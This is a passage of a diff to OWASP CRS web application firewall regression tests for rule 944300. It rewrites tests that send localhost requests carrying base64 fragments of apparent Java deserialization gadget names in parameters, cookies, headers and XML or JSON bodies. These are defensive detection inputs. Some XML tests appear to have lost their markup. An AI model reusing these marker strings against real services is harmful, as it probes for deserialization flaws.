"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-291 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 291 desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-292 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 292 desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-293 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 293 desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-294 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 294 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-295 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 295 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-296 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 296 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-297 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 297 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-298 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 298 desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-299 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 299 desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-300 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl=test" + output: + log: + expect_ids: [944300] + - test_id: 300 desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=d2hpbGVjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-301 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=d2hpbGVjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 301 desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: d2hpbGVjbG9zdXJl=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-302 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: d2hpbGVjbG9zdXJl=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 302 desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: d2hpbGVjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-303 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: d2hpbGVjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 303 desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-304 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 304 desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-305 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 305 desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-306 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 306 desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-307 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 307 desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-308 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" + output: + log: + expect_ids: [944300] + - test_id: 308 desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-309 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 309 desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-310 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 310 desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-311 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ=test" + output: + log: + expect_ids: [944300] + - test_id: 311 desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HdoaWxlY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-312 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HdoaWxlY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 312 desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HdoaWxlY2xvc3VyZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-313 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HdoaWxlY2xvc3VyZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 313 desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HdoaWxlY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-314 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HdoaWxlY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 314 desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-315 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 315 desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-316 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 316 desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - 